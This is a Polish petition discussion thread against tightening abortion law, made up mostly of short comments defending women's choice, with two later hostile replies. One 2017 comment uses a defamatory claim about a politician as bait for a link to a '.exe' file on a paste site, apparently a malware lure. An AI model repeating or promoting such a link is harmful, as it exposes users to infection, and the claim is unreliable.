Przeciw zaostrzeniu prawa do aborcji.

Skontaktuj się z autorem petycji

Temat pod dyskusję został automatycznie utworzony do petycji Przeciw zaostrzeniu prawa do aborcji.

Gość

2016-04-04 18:30

Moja macica - moj wybor. Nie wyobrazam sobie gwaltu, a juz na pewno nie bylabym w stanie nosic i urodzic dziecka z takiego gwaltu. Nie wyobrazam sobie ewentualnego dramatu mojej corki, gdyby ja cos takiego spotkalo. Nie zdecydowalabym sie obarczyc moich dzieci opieka nad chorym kolejnym dzieckiem. To nieludzkie, stawiac ludzi przed takimi wyborami. Kazdy ma swoje sumienie, niech decyduje za siebie. Obecna ustawa jest jak najbardziej wystarczajaca, chroni zycie ludzie, ale chroni rowniez kobiety i ofiary.

Gość

2016-04-06 07:07

MOŻE WRESZCIE REFERENDUM rozwiąże ten spór który toczy się latami

Gość

2016-04-09 14:05

Jestem przeciwna pogardliwemu traktowaniu kobiet, jakby były istotami bez mózgu i emocji. Kobieta ma prawo do decyzji o przerwaniu niepożądanej ciąży w cywilizowanych warunkach. Nie jesteśmy okrutnym Katolandem.

Gość

2016-04-19 08:30

Nie zgadzam się, żeby o prawach Kobiet decydowali mężczyźni a zwłaszcza ci, którzy nie ponoszą żadnej odpowiedzialności ( mam na myśli kler)
5

2016-06-01 18:06

ja rownierz nie wyobrażam sobie po gwałcie nosić dziecka a co dopiero urodzić co musi czuć taka kobieta w takiej sytuacji zastanowil sie ktoś z tych którzy to wymyslili nikt nie powinien decydowac o tym to powinien być wybór każdej kobiety a nie nakazane przez prawo i kosciol to powinna byc sprawa zamknieta 

Gość

2016-06-26 15:01

Nie lubię gdy ktoś komukolwiek mówi jak ma żyć.

Gość

2016-07-26 19:45

Bo jestem dorosła, wolna i ,świadoma.

Gość

2016-07-26 22:11

Bo kobiety powinny mieć prawo wyboru

Gość

2016-07-28 22:13

Ponieważ to co próbuje przeforsować obecna władza to totalny brak wyobraźni. Moje życie to moje wybory.
Alicja

2016-09-25 14:11

Jestem sama mamą 40 -letniej córki leżącej od urodzenia z mpdz.. Pomoc państwa marginalna, cały czas patrzę na cierpienie mojej córki. Przez 40 lat zwiedzilam różne ośrodki , dużo widziałam. Wolałabym aby córka zmarła przede mną niż miałaby trafić do jakiegokolwiek ośrodka. Boję się myśleć gdzie trafi po mojej śmierci. Najbezpeczniej moje dziecko czuje się w swoim domu. Skazywanie dzieci z wadami na ogromne cierpienie jest dla mnie gorsze niż śmierć . Tym bardziej ,że nie ma pomocy dla tych dzieci i dla ich rodzin . Mimo ustawy , nawet za cenę więzienia ,zrobiłabym wszystko,żeby  nie dopuścić do urodzenia  kalekiego dziecka.

Gość

2016-09-25 14:36

Nie zgadzam sie na pozbawienie połowy ludzkosci Polski wlasnosci ciała i praw człowieka. Nie zgadzam się, by zgwałcona 12 latka musiała rodzic i umierała bez pomocy lekarskiej, bo liczy sie plod, kobieta jest wedlug polskiego rzadu smieciem bez praw. Nie zgadzam sie na opresyjne państwo wyznaniowe. Nie zgadzam sie na ten rezim

Gość

2016-09-26 08:36

bo jestem kobietą i mam prawo decydować o swoim ciele

Gość

2016-09-26 18:31

Nikt nie ma prawa ingerować w takim stopniu w życie ludzi. To do czego zmierzają to barbarzyństwo. Jestem człowiekiem, mam również prawo do życia, do leczenia. Chyba ktoś o tym zapomniał?

Gość

2016-09-28 11:33

Ponieważ nie powinno zostać zaostrzone prawo w taki sposób jaki jest proponowany w projekcie zmian o aborcji, ale też nie jestem za rozluźnieniem prawa i chciałbym by zostało jak jest.

Gość

2016-09-29 08:00

Każdy czlowiek ma prawa do decydowania o sobie, swoim zdrowiu, ciele I przyszlosci. Dopoki plod jest zalezny calkowicie od organizmu matki, dopoty kobieta ma miec prawa decydowania o nim. Takie postawienie sprawy I traktowanie kobiety z naleznym szacunkiem zredukuje osobiste i rodzinne dramaty oraz podziemie aborcyjne czy wycieczki aborcyjne dla bogatych.

Gość

2016-10-02 13:36

niezgadzam się na wszystko co mają w planach uważam że jest to wybór kobiety

Gość

2016-10-03 09:46

Uważam że mamy prawo wyboru i decyzję bierzemy na swoje sumienie

Gość

2016-10-04 07:40

Uwarzam , ze kobity maja prawo wyboru . Nikt nie może za Nas decydować. A skoro wladza chce chronic życie to niech chroni Polskie kobiety bo to One zawsze cierpia czy dokonaja aborcji czy tez nie.

Gość

2016-10-05 14:40

To nieludzkie, że NAKAZUJE SIĘ cierpienia, męczarni od narodzin do śmierci zarówno matvce, jak i dziecku, pozbawia możliwości posiadania matki dziecku, którego matka umrze podczas porodu albo UNIEMOŻLIWIA ratowania życia matki.

Gość

2016-10-24 11:22

Czuję się wolnym człowiekiem,nie chcę być do niczego zmuszana,ani nie chcę żadnych zakazów.Sama podejmuję decyzje dotyczące mnie i za odpowladam.Danuta Małgorzewicz

Gość

2016-10-24 17:43

Uważam że ogranicza się w naszym kraju prawa człowieka. Nikt oprócz kobiet nie chodzi w ciąży, tylko one TO wiedzą, co myślą, czują czy pragną opiekować się dzieckiem, chorym w szczególności. Podpiszę też chętnie petycję o likwidacji religii w szkołach i ,o zgrozo, w przedszkolach. Religia zbyt bardzo wkroczyła w życie. Ludzie powinni myśleć samodzielnie. Nie zgadzam się aby, ksiądz czy fanatyczny facet decydował o innych. W Polsce takie wykształcone społeczeństwo, a jednak ograniczone, wystraszone i nietolerancyjne.

Gość

2016-10-24 18:15

Nie wierzę w to co się dzieje. Musimy mieć prawo wyboru . Nie poddamy się .
Danielossikowski2

#23 wuRe:

2017-11-03 19:54

#22: -  

Mam dowody na to, że Kaczyński jest gejem. Byłem jego chłopakiem:
http://www.easypaste.org/file/zlyXP1aJ/kaczynskigej.exe?lang=pl

Gość

#24 Re: xxd

2020-04-15 19:08

#1: -  

Może choć raz ktoś by pomyślał o tych  motdowanych dzieciach a nie tylko o swoich macicach . Rzygać się chce już tym chtonienim praw kobiet ą tym czasem wiele milionów kobiet ginie w łonach swych morderczych matek . 

Gość

#25 Re: xxd

2020-04-15 19:18

#1: -  

A ludzkim jest mordować niewinne dzieci . Taki los pewnie kiedyś spotka was . Warto się nad tym zastanowić, ale po co kiedy myśli się macicą, a ta służy tylko do jednego a przy okazji staje się miejscem zbrodni.  Jak dobrze ,że to wszystko nie trwa wiecznie . Żal mi tych młodych kobiet , które czerpią z takich  macic pozbawionych ludzkich uczuć przykład. Włączyć rozum bo będzie za późno.